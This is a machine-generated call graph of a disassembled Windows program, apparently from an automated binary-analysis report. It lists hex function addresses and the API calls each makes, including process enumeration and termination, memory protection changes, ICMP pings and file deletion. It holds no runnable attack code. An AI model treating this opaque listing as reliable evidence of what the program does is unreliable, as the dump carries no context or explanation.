API calls 102762->102763 102765 a22d59 102763->102765 102769 a23160 9 API calls 102765->102769 102776 a22dd7 messages 102765->102776 102766 a3014b 8 API calls 102766->102775 102767 a3017b 8 API calls 102767->102775 102768 a23082 102993 a2fe39 8 API calls 102768->102993 102780 a22d73 102769->102780 102771 a22f2d 102771->102667 102772 a230bd 102772->102667 102774 a20340 206 API calls 102774->102775 102775->102754 102775->102757 102775->102760 102775->102766 102775->102767 102775->102774 102775->102776 102777 a67c59 102775->102777 102776->102768 102778 a23160 9 API calls 102776->102778 102782 a22e8b messages 102776->102782 102856 a99fe8 102776->102856 102859 a91858 102776->102859 102866 a9a9ac 102776->102866 102874 a9ad47 102776->102874 102879 a99ffc 102776->102879 102882 a2ac3e 102776->102882 102901 a9a6aa 102776->102901 102909 a8664c 102776->102909 102916 a90fb8 102776->102916 102941 a9a5b2 102776->102941 102998 a83fe1 81 API calls __wsopen_s 102776->102998 102996 a83fe1 81 API calls __wsopen_s 102777->102996 102778->102776 102780->102776 102783 a1bed9 8 API calls 102780->102783 102782->102771 102983 a2e322 8 API calls messages 102782->102983 102783->102776 102794->102686 102795->102692 102796->102673 102798 a18ed5 102797->102798 102814 a18ed2 102797->102814 102799 a18f0b 102798->102799 102800 a18edd 102798->102800 102802 a18f1d 102799->102802 102803 a56a38 102799->102803 102810 a56b1f 102799->102810 103512 a35536 26 API calls 102800->103512 103513 a2fe6f 51 API calls 102802->103513 102813 a3017b 8 API calls 102803->102813 102819 a56ab1 102803->102819 102804 a18eed 102809 a3014b 8 API calls 102804->102809 102807 a56b37 102807->102807 102811 a18ef7 102809->102811 103515 a354f3 26 API calls 102810->103515 102812 a1b329 8 API calls 102811->102812 102812->102814 102816 a56a81 102813->102816 102814->102690 102815 a3014b 8 API calls 102817 a56aa8 102815->102817 102816->102815 102818 a1b329 8 API calls 102817->102818 102818->102819 103514 a2fe6f 51 API calls 102819->103514 102820->102679 102822 a3014b ___std_exception_copy 102821->102822 102823 a3016a 102822->102823 102825 a3016c 102822->102825 102840 a3521d 7 API calls 2 library calls 102822->102840 102823->102727 102826 a309dd 102825->102826 102841 a33614 RaiseException 102825->102841 102842 a33614 RaiseException 102826->102842 102829 a309fa 102829->102727 102831 a30150 ___std_exception_copy 102830->102831 102832 a3016a 102831->102832 102835 a3016c 102831->102835 102843 a3521d 7 API calls 2 library calls 102831->102843 102832->102727 102834 a309dd 102845 a33614 RaiseException 102834->102845 102835->102834 102844 a33614 RaiseException 102835->102844 102838 a309fa 102838->102727 102839->102727 102840->102822 102841->102826 102842->102829 102843->102831 102844->102834 102845->102838 102847 a231a1 102846->102847 102854 a2317d 102846->102854 102999 a305b2 5 API calls __Init_thread_wait 102847->102999 102848 a22bb0 102848->102746 102850 a231ab 102850->102854 103000 a30568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 102850->103000 102852 a29f47 102852->102848 103002 a30568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 102852->103002 102854->102848 103001 a305b2 5 API calls __Init_thread_wait 102854->103001 103003 a989b6 102856->103003 102858 a99ff8 102858->102776 103143 a1c98d 102859->103143 102861 a9186c 102863 a918a9 102861->102863 102864 a1c98d 39 API calls 102861->102864 102862 a918cc 102862->102776 102863->102862 102865 a1b4c8 8 API calls 102863->102865 102864->102863 102865->102862 102867 a9aa08 102866->102867 102873 a9a9c8 102866->102873 102868 a9aa26 102867->102868 102870 a1c98d 39 API calls 102867->102870 102869 a1c98d 39 API calls 102868->102869 102871 a9aa8e 102868->102871 102868->102873 102869->102871 102870->102868 103149 a80372 102871->103149 102873->102776 102875 a18ec0 52 API calls 102874->102875 102876 a9ad63 102875->102876 103220 a7dd87 CreateToolhelp32Snapshot Process32FirstW 102876->103220 102878 a9ad72 102878->102776 102880 a989b6 119 API calls 102879->102880 102881 a9a00c 102880->102881 102881->102776 102883 a18ec0 52 API calls 102882->102883 102884 a2ac68 102883->102884 102885 a2bc58 8 API calls 102884->102885 102886 a2ac7f 102885->102886 102887 a1c98d 39 API calls 102886->102887 102896 a2b09b _wcslen 102886->102896 102887->102896 102888 a34d98 _strftime 40 API calls 102888->102896 102889 a2bbbe 43 API calls 102889->102896 102893 a16c03 8 API calls 102893->102896 102894 a2b1fb 102894->102776 102895 a18ec0 52 API calls 102895->102896 102896->102888 102896->102889 102896->102893 102896->102894 102896->102895 102897 a18577 8 API calls 102896->102897 102898 a1c98d 39 API calls 102896->102898 103329 a1396b 102896->103329 103339 a13907 102896->103339 103343 a17ad5 102896->103343 103348 a1ad40 8 API calls __fread_nolock 102896->103348 103349 a17b1a 8 API calls 102896->103349 102897->102896 102898->102896 102903 a9a705 102901->102903 102908 a9a6c5 102901->102908 102902 a9a723 102904 a1c98d 39 API calls 102902->102904 102906 a9a780 102902->102906 102902->102908 102903->102902 102905 a1c98d 39 API calls 102903->102905 102904->102906 102905->102902 102907 a80372 58 API calls 102906->102907 102907->102908 102908->102776 102910 a18ec0 52 API calls 102909->102910 102911 a86662 102910->102911 103406 a7dc54 102911->103406 102913 a8666a 102914 a8666e GetLastError 102913->102914 102915 a86683 102913->102915 102914->102915 102915->102776 102917 a90fe1 102916->102917 102918 a9100f WSAStartup 102917->102918 102921 a1c98d 39 API calls 102917->102921 102919 a91023 messages 102918->102919 102920 a91054 102918->102920 102919->102776 103448 a2c1f6 102920->103448 102922 a90ffc 102921->102922 102922->102918 102925 a1c98d 39 API calls 102922->102925 102927 a9100b 102925->102927 102926 a18ec0 52 API calls 102928 a91069 102926->102928 102927->102918 103453 a2f9d4 WideCharToMultiByte 102928->103453 102930 a91075 inet_addr gethostbyname 102930->102919 102931 a91093 IcmpCreateFile 102930->102931 102931->102919 102932 a910d3 102931->102932 102933 a3017b 8 API calls 102932->102933 102934 a910ec 102933->102934 103461 a1423c 102934->103461 102937 a9112b IcmpSendEcho 102940 a9114c 102937->102940 102938 a91102 IcmpSendEcho 102938->102940 102939 a91212 IcmpCloseHandle WSACleanup 102939->102919 102940->102939 102942 a9a5c5 102941->102942 102943 a18ec0 52 API calls 102942->102943 102946 a9a5d4 102942->102946 102944 a9a632 102943->102944 103466 a818a9 102944->103466 102946->102776 102948 a97b38 102947->102948 102949 a97b52 102947->102949 103507 a83fe1 81 API calls __wsopen_s 102948->103507 102950 a960e6 8 API calls 102949->102950 102952 a97b5d 102950->102952 102953 a20340 205 API calls 102952->102953 102954 a97bc1 102953->102954 102955 a97b4a 102954->102955 102956 a97c5c 102954->102956 102960 a97c03 102954->102960 102955->102743 102957 a97cb0 102956->102957 102958 a97c62 102956->102958 102957->102955 102959 a18ec0 52 API calls 102957->102959 103508 a81ad8 8 API calls 102958->103508 102961 a97cc2 102959->102961 102965 a8148b 8 API calls 102960->102965 102963 a1c2c9 8 API calls 102961->102963 102966 a97ce6 CharUpperBuffW 102963->102966 102964 a97c85 103509 a1bd07 8 API calls 102964->103509 102968 a97c3b 102965->102968 102970 a97d00 102966->102970 102969 a22b20 205 API calls 102968->102969 102969->102955 102971 a97d53 102970->102971 102972 a97d07 102970->102972 102973 a18ec0 52 API calls 102971->102973 102976 a8148b 8 API calls 102972->102976 102974 a97d5b 102973->102974 103510 a2aa65 9 API calls 102974->103510 102977 a97d35 102976->102977 102978 a22b20 205 API calls 102977->102978 102978->102955 102979 a97d65 102979->102955 102980 a18ec0 52 API calls 102979->102980 102981 a97d80 102980->102981 103511 a1bd07 8 API calls 102981->103511 102983->102782 102984->102740 102986 a1b338 _wcslen 102985->102986 102987 a3017b 8 API calls 102986->102987 102988 a1b360 __fread_nolock 102987->102988 102989 a3014b 8 API calls 102988->102989 102990 a1b376 102989->102990 102990->102755 102991->102751 102992->102768 102993->102772 102994->102776 102995->102776 102996->102776 102997->102780 102998->102776 102999->102850 103000->102854 103001->102852 103002->102848 103004 a18ec0 52 API calls 103003->103004 103005 a989ed 103004->103005 103027 a98a32 messages 103005->103027 103041 a99730 103005->103041 103007 a98cde 103008 a98eac 103007->103008 103012 a98cec 103007->103012 103090 a99941 59 API calls 103008->103090 103011 a98ebb 103011->103012 103013 a98ec7 103011->103013 103054 a988e3 103012->103054 103013->103027 103014 a18ec0 52 API calls 103031 a98aa6 103014->103031 103019 a98d25 103068 a2ffe0 103019->103068 103022 a98d5f 103076 a17e12 103022->103076 103023 a98d45 103075 a83fe1 81 API calls __wsopen_s 103023->103075 103026 a98d50 GetCurrentProcess TerminateProcess 103026->103022 103027->102858 103031->103007 103031->103014 103031->103027 103073 a74ad3 8 API calls __fread_nolock 103031->103073 103074 a98f7a 41 API calls _strftime 103031->103074 103033 a98f22 103033->103027 103036 a98f36 FreeLibrary 103033->103036 103034 a98d9e 103088 a995d8 74 API calls 103034->103088 103036->103027 103039 a1b4c8 8 API calls 103040 a98daf 103039->103040 103040->103033 103040->103039 103089 a21ca0 8 API calls 103040->103089 103091 a995d8 74 API calls 103040->103091 103092 a1c2c9 103041->103092 103043 a9974b CharLowerBuffW 103098 a79805 103043->103098 103050 a9979b 103122 a1adf4 103050->103122 103052 a998bb _wcslen 103052->103031 103053 a997a5 _wcslen 103053->103052 103126 a98f7a 41 API calls _strftime 103053->103126 103055 a988fe 103054->103055 103059 a98949 103054->103059 103056 a3017b 8 API calls 103055->103056 103057 a98920 103056->103057 103058 a3014b 8 API calls 103057->103058 103057->103059 103058->103057 103060 a99af3 103059->103060 103061 a99d08 messages 103060->103061 103066 a99b17 _strcat _wcslen ___std_exception_copy 103060->103066 103061->103019 103062 a1c98d 39 API calls 103062->103066 103063 a1ca5b 39 API calls 103063->103066 103064 a1c63f 39 API calls 103064->103066 103065 a18ec0 52 API calls 103065->103066 103066->103061 103066->103062 103066->103063 103066->103064 103066->103065 103130 a7f8c5 10 API calls _wcslen 103066->103130 103069 a2fff5 103068->103069 103070 a3008d NtProtectVirtualMemory 103069->103070 103071 a3005b 103069->103071 103072 a3007b CloseHandle 103069->103072 103070->103071 103071->103022 103071->103023 103072->103071 103073->103031 103074->103031 103075->103026 103077 a17e1a 103076->103077 103078 a3014b 8 API calls 103077->103078 103079 a17e28 103078->103079 103131 a18445 103079->103131 103082 a18470 103134 a1c760 103082->103134 103084 a18480 103085 a3017b 8 API calls 103084->103085 103086 a1851c 103084->103086 103085->103086 103086->103040 103087 a21ca0 8 API calls 103086->103087 103087->103034 103088->103040 103089->103040 103090->103011 103091->103040 103093 a1c2dc 103092->103093 103097 a1c2d9 __fread_nolock 103092->103097 103094 a3014b 8 API calls 103093->103094 103095 a1c2e7 103094->103095 103096 a3017b 8 API calls 103095->103096 103096->103097 103097->103043 103099 a79825 _wcslen 103098->103099 103100 a79914 103099->103100 103103 a7985a 103099->103103 103104 a79919 103099->103104 103100->103053 103105 a1bf73 103100->103105 103103->103100 103127 a2e36b 41 API calls 103103->103127 103104->103100 103128 a2e36b 41 API calls 103104->103128 103106 a3017b 8 API calls 103105->103106 103107 a1bf88 103106->103107 103108 a3014b 8 API calls 103107->103108 103109 a1bf96 103108->103109 103110 a1acc0 103109->103110 103112 a1ace1 103110->103112 103121 a1accf 103110->103121 103111 a1c2c9 8 API calls 103113 a605a3 __fread_nolock 103111->103113 103114 a60557 103112->103114 103115 a1ad07 103112->103115 103112->103121 103117 a3014b 8 API calls 103114->103117 103129 a188e8 8 API calls 103115->103129 103118 a60561 103117->103118 103120 a3017b 8 API calls 103118->103120 103119 a1acda __fread_nolock 103119->103050 103120->103121 103121->103111 103121->103119 103123 a1ae02 103122->103123 103124 a1ae0b __fread_nolock 103122->103124 103123->103124 103125 a1c2c9 8 API calls 103123->103125 103124->103053 103124->103124 103125->103124 103126->103052 103127->103103 103128->103104 103129->103119 103130->103066 103132 a3014b 8 API calls 103131->103132 103133 a17e30 103132->103133 103133->103082 103135 a1c76b 103134->103135 103136 a61285 103135->103136 103141 a1c773 messages 103135->103141 103137 a3014b 8 API calls 103136->103137 103139 a61291 103137->103139 103138 a1c77a 103138->103084 103141->103138 103142 a1c7e0 8 API calls messages 103141->103142 103142->103141 103144 a1c99e 103143->103144 103145 a1c9a5 103143->103145 103144->103145 103148 a36641 39 API calls _strftime 103144->103148 103145->102861 103147 a1c9e8 103147->102861 103148->103147 103181 a802aa 103149->103181 103152 a8040b 103154 a80471 103152->103154 103156 a8041b 103152->103156 103153 a803f3 103197 a805e9 56 API calls __fread_nolock 103153->103197 103157 a804a1 103154->103157 103158 a80507 103154->103158 103173 a80399 __fread_nolock 103154->103173 103180 a80453 103156->103180 103198 a82855 10 API calls 103156->103198 103159 a804d1 103157->103159 103160 a804a6 103157->103160 103161 a805b0 103158->103161 103162 a80510 103158->103162 103159->103173 103202 a1ca5b 39 API calls 103159->103202 103160->103173 103201 a1ca5b 39 API calls 103160->103201 103161->103173 103206 a1c63f 39 API calls 103161->103206 103163 a8058d 103162->103163 103164 a80515 103162->103164 103163->103173 103205 a1c63f 39 API calls 103163->103205 103168 a8051b 103164->103168 103169 a80554 103164->103169 103168->103173 103203 a1c63f 39 API calls 103168->103203 103169->103173 103204 a1c63f 39 API calls 103169->103204 103173->102873 103175 a80427 103199 a82855 10 API calls 103175->103199 103178 a8043e __fread_nolock 103200 a82855 10 API calls 103178->103200 103188 a81844 103180->103188 103182 a802f7 103181->103182 103186 a802bb 103181->103186 103183 a1c98d 39 API calls 103182->103183 103184 a802f5 103183->103184 103184->103152 103184->103153 103184->103173 103185 a18ec0 52 API calls 103185->103186 103186->103184 103186->103185 103207 a34d98 103186->103207 103189 a8184f 103188->103189 103190 a3014b 8 API calls 103189->103190 103191 a81856 103190->103191 103192 a81862 103191->103192 103193 a81883 103191->103193 103195 a3017b 8 API calls 103192->103195 103194 a3017b 8 API calls 103193->103194 103196 a8186b ___scrt_fastfail 103194->103196 103195->103196 103196->103173 103197->103173 103198->103175 103199->103178 103200->103180 103201->103173 103202->103173 103203->103173 103204->103173 103205->103173 103206->103173 103208 a34da6 103207->103208 103209 a34e1b 103207->103209 103216 a34dcb 103208->103216 103217 a3f649 20 API calls __dosmaperr 103208->103217 103219 a34e2d 40 API calls 3 library calls 103209->103219 103212 a34e28 103212->103186 103213 a34db2 103218 a42b5c 26 API calls pre_c_initialization 103213->103218 103215 a34dbd 103215->103186 103216->103186 103217->103213 103218->103215 103219->103212 103230 a7e80e 103220->103230 103222 a7de86 CloseHandle 103222->102878 103223 a7ddd4 Process32NextW 103223->103222 103228 a7ddcd 103223->103228 103224 a1bf73 8 API calls 103224->103228 103225 a1b329 8 API calls 103225->103228 103228->103222 103228->103223 103228->103224 103228->103225 103236 a1568e 103228->103236 103278 a17bb5 103228->103278 103287 a2e36b 41 API calls 103228->103287 103232 a7e819 103230->103232 103231 a7e830 103289 a3666b 39 API calls _strftime 103231->103289 103232->103231 103235 a7e836 103232->103235 103288 a36722 GetStringTypeW _strftime 103232->103288 103235->103228 103237 a1bf73 8 API calls 103236->103237 103238 a156a4 103237->103238 103239 a1bf73 8 API calls 103238->103239 103240 a156ac 103239->103240 103241 a1bf73 8 API calls 103240->103241 103242 a156b4 103241->103242 103243 a1bf73 8 API calls 103242->103243 103244 a156bc 103243->103244 103245 a156f0 103244->103245 103246 a54da1 103244->103246 103248 a1acc0 8 API calls 103245->103248 103247 a1bed9 8 API calls 103246->103247 103249 a54daa 103247->103249 103250 a156fe 103248->103250 103293 a1bd57 103249->103293 103252 a1adf4 8 API calls 103250->103252 103253 a15708 103252->103253 103254 a15733 103253->103254 103255 a1acc0 8 API calls 103253->103255 103256 a15778 103254->103256 103257 a15754 103254->103257 103272 a54dcc 103254->103272 103259 a15729 103255->103259 103258 a1acc0 8 API calls 103256->103258 103257->103256 103290 a1655e 103257->103290 103260 a15789 103258->103260 103261 a1adf4 8 API calls 103259->103261 103263 a1579f 103260->103263 103269 a1bed9 8 API calls 103260->103269 103261->103254 103266 a157b3 103263->103266 103270 a1bed9 8 API calls 103263->103270 103267 a157be 103266->103267 103273 a1bed9 8 API calls 103266->103273 103274 a1bed9 8 API calls 103267->103274 103275 a157c9 103267->103275 103268 a54e8c 103268->103256 103276 a1655e 8 API calls 103268->103276 103311 a1ad40 8 API calls __fread_nolock 103268->103311 103269->103263 103270->103266 103271 a1acc0 8 API calls 103271->103256 103299 a18577 103272->103299 103273->103267 103274->103275 103275->103228 103276->103268 103279 a17bc7 103278->103279 103280 a5641d 103278->103280 103313 a17bd8 103279->103313 103323 a713c8 8 API calls __fread_nolock 103280->103323 103283 a17bd3 103283->103228 103284 a56427 103285 a56433 103284->103285 103286 a1bed9 8 API calls 103284->103286 103286->103285 103287->103228 103288->103232 103289->103235 103291 a1c2c9 8 API calls 103290->103291 103292 a15761 103291->103292 103292->103256 103292->103271 103294 a1bd71 103293->103294 103295 a1bd64 103293->103295 103296 a3014b 8 API calls 103294->103296 103295->103254 103297 a1bd7b 103296->103297 103298 a3017b 8 API calls 103297->103298 103298->103295 103300 a56610 103299->103300 103301 a18587 _wcslen 103299->103301 103302 a1adf4 8 API calls 103300->103302 103304 a185c2 103301->103304 103305 a1859d 103301->103305 103303 a56619 103302->103303 103303->103303 103307 a3014b 8 API calls 103304->103307 103312 a188e8 8 API calls 103305->103312 103309 a185ce 103307->103309 103308 a185a5 __fread_nolock 103308->103268 103310 a3017b 8 API calls 103309->103310 103310->103308 103311->103268 103312->103308 103314 a17be7 103313->103314 103320 a17c1b __fread_nolock 103313->103320 103315 a5644e 103314->103315 103316 a17c0e 103314->103316 103314->103320 103317 a3014b 8 API calls 103315->103317 103324 a17d74 103316->103324 103319 a5645d 103317->103319 103321 a3017b 8 API calls 103319->103321 103320->103283 103322 a56491 __fread_nolock 103321->103322 103323->103284 103325 a17d8a 103324->103325 103328 a17d85 __fread_nolock 103324->103328 103326 a3017b 8 API calls 103325->103326 103327 a56528 103325->103327 103326->103328 103327->103327 103328->103320 103330 a13996 ___scrt_fastfail 103329->103330 103350 a15f32 103330->103350 103333 a13a1c 103335 a540cd Shell_NotifyIconW 103333->103335 103336 a13a3a Shell_NotifyIconW 103333->103336 103354 a161a9 103336->103354 103338 a13a50 103338->102896 103340 a13969 103339->103340 103341 a13919 ___scrt_fastfail 103339->103341 103340->102896 103342 a13938 Shell_NotifyIconW 103341->103342 103342->103340 103344 a3017b 8 API calls 103343->103344 103345 a17afa 103344->103345 103346 a3014b 8 API calls 103345->103346 103347 a17b08 103346->103347 103347->102896 103348->102896 103349->102896 103351 a139eb 103350->103351 103352 a15f4e 103350->103352 103351->103333 103384 a7d11f 42 API calls _strftime 103351->103384 103352->103351 103353 a55070 DestroyIcon 103352->103353 103353->103351 103355 a161c6 103354->103355 103374 a162a8 103354->103374 103356 a17ad5 8 API calls 103355->103356 103357 a161d4 103356->103357 103358 a161e1 103357->103358 103359 a55278 LoadStringW 103357->103359 103360 a18577 8 API calls 103358->103360 103362 a55292 103359->103362 103361 a161f6 103360->103361 103363 a16203 103361->103363 103364 a552ae 103361->103364 103366 a1bed9 8 API calls 103362->103366 103370 a16229 ___scrt_fastfail 103362->103370 103363->103362 103365 a1620d 103363->103365 103364->103370 103371 a552f1 103364->103371 103373 a1bf73 8 API calls 103364->103373 103385 a16b7c 103365->103385 103366->103370 103369 a17bb5 8 API calls 103369->103370 103372 a1628e Shell_NotifyIconW 103370->103372 103395 a2fe6f 51 API calls 103371->103395 103372->103374 103375 a552d8 103373->103375 103374->103338 103394 a7a350 9 API calls 103375->103394 103378 a55310 103380 a16b7c 8 API calls 103378->103380 103379 a552e3 103381 a17bb5 8 API calls 103379->103381 103382 a55321 103380->103382 103381->103371 103383 a16b7c 8 API calls 103382->103383 103383->103370 103384->103333 103386 a16b93 103385->103386 103387 a557fe 103385->103387 103396 a16ba4 103386->103396 103388 a3014b 8 API calls 103387->103388 103391 a55808 _wcslen 103388->103391 103390 a1621b 103390->103369 103392 a3017b 8 API calls 103391->103392 103393 a55841 __fread_nolock 103392->103393 103394->103379 103395->103378 103397 a16bb4 _wcslen 103396->103397 103398 a55860 103397->103398 103399 a16bc7 103397->103399 103401 a3014b 8 API calls 103398->103401 103400 a17d74 8 API calls 103399->103400 103402 a16bd4 __fread_nolock 103400->103402 103403 a5586a 103401->103403 103402->103390 103404 a3017b 8 API calls 103403->103404 103405 a5589a __fread_nolock 103404->103405 103407 a1bf73 8 API calls 103406->103407 103408 a7dc73 103407->103408 103409 a1bf73 8 API calls 103408->103409 103410 a7dc7c 103409->103410 103411 a1bf73 8 API calls 103410->103411 103412 a7dc85 103411->103412 103430 a15851 103412->103430 103417 a7dcab 103419 a1568e 8 API calls 103417->103419 103418 a16b7c 8 API calls 103418->103417 103420 a7dcbf FindFirstFileW 103419->103420 103421 a7dd4b FindClose 103420->103421 103424 a7dcde 103420->103424 103427 a7dd56 103421->103427 103422 a7dd26 FindNextFileW 103422->103424 103423 a1bed9 8 API calls 103423->103424 103424->103421 103424->103422 103424->103423 103425 a17bb5 8 API calls 103424->103425 103426 a16b7c 8 API calls 103424->103426 103425->103424 103428 a7dd17 DeleteFileW 103426->103428 103427->102913 103428->103422 103429 a7dd42 FindClose 103428->103429 103429->103427 103442 a522d0 103430->103442 103433 a15898 103435 a1bd57 8 API calls 103433->103435 103434 a1587d 103436 a18577 8 API calls 103434->103436 103437 a15889 103435->103437 103436->103437 103444 a155dc 103437->103444 103440 a7eab0 GetFileAttributesW 103441 a7dc99 103440->103441 103441->103417 103441->103418 103443 a1585e GetFullPathNameW 103442->103443 103443->103433 103443->103434 103445 a155ea 103444->103445 103446 a1adf4 8 API calls 103445->103446 103447 a155fe 103446->103447 103447->103440 103449 a3017b 8 API calls 103448->103449 103450 a2c209 103449->103450 103451 a3014b 8 API calls 103450->103451 103452 a2c215 103451->103452 103452->102926 103454 a2fa35 103453->103454 103455 a2f9fe 103453->103455 103465 a2fe8a 8 API calls 103454->103465 103456 a3017b 8 API calls 103455->103456 103458 a2fa05 WideCharToMultiByte 103456->103458 103464 a2fa3e 8 API calls __fread_nolock 103458->103464 103460 a2fa29 103460->102930 103462 a3014b 8 API calls 103461->103462 103463 a1424e 103462->103463 103463->102937 103463->102938 103464->103460 103465->103460 103467 a818b6 103466->103467 103468 a3014b 8 API calls 103467->103468 103469 a818bd 103468->103469 103472 a7fcb5 103469->103472 103471 a818f7 103471->102946 103473 a1c2c9 8 API calls 103472->103473 103474 a7fcc8 CharLowerBuffW 103473->103474 103476 a7fcdb 103474->103476 103475 a1655e 8 API calls 103475->103476 103476->103475 103477 a7fd19 103476->103477 103489 a7fce5 ___scrt_fastfail 103476->103489 103478 a7fd2b 103477->103478 103479 a1655e 8 API calls 103477->103479 103480 a3017b 8 API calls 103478->103480 103479->103478 103484 a7fd59 103480->103484 103483 a7fdb8 103486 a3014b 8 API calls 103483->103486 103483->103489 103485 a7fd7b 103484->103485 103505 a7fbed 8 API calls 103484->103505 103490 a7fe0c 103485->103490 103487 a7fdd2 103486->103487 103488 a3017b 8 API calls 103487->103488 103488->103489 103489->103471 103491 a1bf73 8 API calls 103490->103491 103492 a7fe3e 103491->103492 103493 a1bf73 8 API calls 103492->103493 103494 a7fe47 103493->103494 103495 a1bf73 8 API calls 103494->103495 103499 a7fe50 103495->103499 103496 a80114 103496->103483 103497 a1ad40 8 API calls 103497->103499 103498 a366f8 GetStringTypeW 103498->103499 103499->103496 103499->103497 103499->103498 103500 a18577 8 API calls 103499->103500 103502 a7fe0c 40 API calls 103499->103502 103503 a36641 39 API calls 103499->103503 103504 a1bed9 8 API calls 103499->103504 103506 a36722 GetStringTypeW _strftime 103499->103506 103500->103499 103502->103499 103503->103499 103504->103499 103505->103484 103506->103499 103507->102955 103508->102964 103509->102955 103510->102979 103511->102955 103512->102804 103513->102804 103514->102810 103515->102807 103516->102708 103517->102702 103518->102703 103519->102703 103537 a1cf80 103520->103537 103522 a1bfb5 103523 a60db6 103522->103523 103524 a1bfc3 103522->103524 103525 a1b4c8 8 API calls 103523->103525 103526 a3014b 8 API calls 103524->103526 103528 a60dc1 103525->103528 103527 a1bfd4 103526->103527 103529 a1bf73 8 API calls 103527->103529 103530 a1bfde 103529->103530 103531 a1bfed 103530->103531 103532 a1bed9 8 API calls 103530->103532 103533 a3014b 8 API calls 103531->103533 103532->103531 103534 a1bff7 103533->103534 103545 a1be7b 39 API calls 103534->103545 103536 a1c01b 103536->102609 103538 a1d1c7 103537->103538 103540 a1cf93 103537->103540 103538->103522 103541 a1bf73 8 API calls 103540->103541 103543 a1d03d 103540->103543 103546 a305b2 5 API calls __Init_thread_wait 103540->103546 103547 a30413 29 API calls __onexit 103540->103547 103548 a30568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 103540->103548 103541->103540 103543->103522 103545->103536 103546->103540 103547->103540 103548->103540 104974 a11044 104979 a12793 104974->104979 104976 a1104a 105015 a30413 29 API calls __onexit 104976->105015 104978 a11054 105016 a12a38 104979->105016 104983 a1280a 104984 a1bf73 8 API calls 104983->104984 104985 a12814 104984->104985 104986 a1bf73 8 API calls 104985->104986 104987 a1281e 104986->104987 104988 a1bf73 8 API calls 104987->104988 104989 a12828 104988->104989 104990 a1bf73 8 API calls 104989->104990 104991 a12866 104990->104991 104992 a1bf73 8 API calls 104991->104992 104993 a12932 104992->104993 105026 a12dbc 104993->105026 104997 a12964 104998 a1bf73 8 API calls 104997->104998 104999 a1296e 104998->104999 105000 a23160 9 API calls 104999->105000 105001 a12999 105000->105001 105053 a13166 105001->105053 105003 a129b5 105004 a129c5 GetStdHandle 105003->105004 105005 a539e7 105004->105005 105006 a12a1a 105004->105006 105005->105006 105007 a539f0 105005->105007 105009 a12a27 OleInitialize 105006->105009 105008 a3014b 8 API calls 105007->105008 105010 a539f7 105008->105010 105009->104976 105060 a80ac4 InitializeCriticalSectionAndSpinCount InterlockedExchange GetCurrentProcess GetCurrentProcess DuplicateHandle 105010->105060 105012 a53a00 105061 a812eb CreateThread 105012->105061 105014 a53a0c CloseHandle 105014->105006 105015->104978 105062 a12a91 105016->105062 105019 a12a91 8 API calls 105020 a12a70 105019->105020 105021 a1bf73 8 API calls 105020->105021 105022 a12a7c 105021->105022 105023 a18577 8 API calls 105022->105023 105024 a127c9 105023->105024 105025 a1327e 6 API calls 105024->105025 105025->104983 105027 a1bf73 8 API calls 105026->105027 105028 a12dcc 105027->105028 105029 a1bf73 8 API calls 105028->105029 105030 a12dd4 105029->105030 105069 a181d6 105030->105069 105033 a181d6 8 API calls 105034 a12de4 105033->105034 105035 a1bf73 8 API calls 105034->105035 105036 a12def 105035->105036 105037 a3014b 8 API calls 105036->105037 105038 a1293c 105037->105038 105039 a13205 105038->105039 105040 a13213 105039->105040 105041 a1bf73 8 API calls 105040->105041 105042 a1321e 105041->105042 105043 a1bf73 8 API calls 105042->105043 105044 a13229 105043->105044 105045 a1bf73 8 API calls 105044->105045 105046 a13234 105045->105046 105047 a1bf73 8 API calls 105046->105047 105048 a1323f 105047->105048 105049 a181d6 8 API calls 105048->105049 105050 a1324a 105049->105050 105051 a3014b 8 API calls 105050->105051 105052 a13251 RegisterWindowMessageW 105051->105052 105052->104997 105054 a13176 105053->105054 105055 a53c8f 105053->105055 105056 a3014b 8 API calls 105054->105056 105072 a83c4e 8 API calls 105055->105072 105058 a1317e 105056->105058 105058->105003 105059 a53c9a 105060->105012 105061->105014 105073 a812d1 14 API calls 105061->105073 105063 a1bf73 8 API calls 105062->105063 105064 a12a9c 105063->105064 105065 a1bf73 8 API calls 105064->105065 105066 a12aa4 105065->105066 105067 a1bf73 8 API calls 105066->105067 105068 a12a66 105067->105068 105068->105019 105070 a1bf73 8 API calls 105069->105070 105071 a12ddc 105070->105071 105071->105033 105072->105059 105074 a48782 105079 a4853e 105074->105079 105077 a487aa 105080 a4856f try_get_first_available_module 105079->105080 105090 a486b8 105080->105090 105094 a3917b 40 API calls 2 library calls 105080->105094 105082 a4876e 105098 a42b5c 26 API calls pre_c_initialization 105082->105098 105084 a486c3 105084->105077 105091 a50d04 105084->105091 105086 a4870c 105086->105090 105095 a3917b 40 API calls 2 library calls 105086->105095 105088 a4872b 105088->105090 105096 a3917b 40 API calls 2 library calls 105088->105096 105090->105084 105097 a3f649 20 API calls __dosmaperr 105090->105097 105099 a50401 105091->105099 105093 a50d1f 105093->105077 105094->105086 105095->105088 105096->105090 105097->105082 105098->105084 105100 a5040d ___BuildCatchObject 105099->105100 105101 a5041b 105100->105101 105104 a50454 105100->105104 105157 a3f649 20 API calls __dosmaperr 105101->105157 105103 a50420 105158 a42b5c 26 API calls pre_c_initialization 105103->105158 105110 a509db 105104->105110 105109 a5042a __fread_nolock 105109->105093 105160 a507af 105110->105160 105113 a50a26 105178 a45594 105113->105178 105114 a50a0d 105192 a3f636 20 API calls __dosmaperr 105114->105192 105117 a50a2b 105119 a50a34 105117->105119 105120 a50a4b 105117->105120 105118 a50a12 105193 a3f649 20 API calls __dosmaperr 105118->105193 105194 a3f636 20 API calls __dosmaperr 105119->105194 105191 a5071a CreateFileW 105120->105191 105124 a50a39 105195 a3f649 20 API calls __dosmaperr 105124->105195 105126 a50b01 GetFileType 105127 a50b53 105126->105127 105128 a50b0c GetLastError 105126->105128 105200 a454dd 21 API calls 3 library calls 105127->105200 105198 a3f613 20 API calls 2 library calls 105128->105198 105129 a50ad6 GetLastError 105197 a3f613 20 API calls 2 library calls 105129->105197 105130 a50a84 105130->105126 105130->105129 105196 a5071a CreateFileW 105130->105196 105134 a50b1a CloseHandle 105134->105118 105137 a50b43 105134->105137 105136 a50ac9 105136->105126 105136->105129 105199 a3f649 20 API calls __dosmaperr 105137->105199 105138 a50b74 105140 a50bc0 105138->105140 105201 a5092b 72 API calls 4 library calls 105138->105201 105145 a50bed 105140->105145 105202 a504cd 72 API calls 4 library calls 105140->105202 105141 a50b48 105141->105118 105144 a50be6 105144->105145 105146 a50bfe 105144->105146 105203 a48a2e 105145->105203 